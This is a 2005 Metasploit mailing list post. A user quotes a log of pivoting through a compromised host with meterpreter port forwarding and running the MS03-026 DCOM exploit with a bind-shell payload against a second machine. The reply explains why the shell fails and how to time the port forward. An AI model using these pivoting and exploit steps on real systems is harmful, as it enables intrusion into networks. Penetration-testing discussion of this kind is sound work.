Metasploit mailing list archives
use of meterpreter (copy for the list )
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 15 Apr 2005 02:14:10 -0500
On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:
Just took a second try, but i'm still doing something wrong :( Here's "the log" : 1. Hacking "proxy Host" 2. setting up portforwarding meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135 portfwd: Successfully created local listener on port 9000. meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555 portfwd: Successfully created local listener on port 5555. meterpreter> portfwd -v Local port forward listeners: 127.0.0.1:9000 <-> 'NextTargetIP':135 127.0.0.1:5555 <-> 'NextTargetIP':5555 3. Launching another instance of metasploit and prepare next exploit Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ --------- ------------------ required RHOST 127.0.0.1 The target address required RPORT 9000 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 5555 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555 [*] Exiting Bind Handler. maybe i setup proxy for listen Port wrong or something else ? What do i have to fix ?
My guess is that what's happening is the bind handler is establishing the connection before you've finished exploiting the host. What I'd recommend doing is waiting a few seconds to create the port 5555 port forward until after the exploit should have completed. Once it has, create the port forward on port 5555 and the bind handler should establish its connection. Right now this is all kind of kludgey because it isn't really fully integrated (more of a prototype), but it should work. What's happening right now is the bind handler is establishing the connection to port 5555 immediately (before the exploit even takes place) which then instructs the meterpreter server to connect to the target host on port 5555. Since the exploit hasn't finished, the target host isn't listening on port 5555 and thus the meterpreter server returns a failure indication to the client which causes it to close its half of the port forward for that connection (thus why the bind handler exits).
Current thread:
- use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)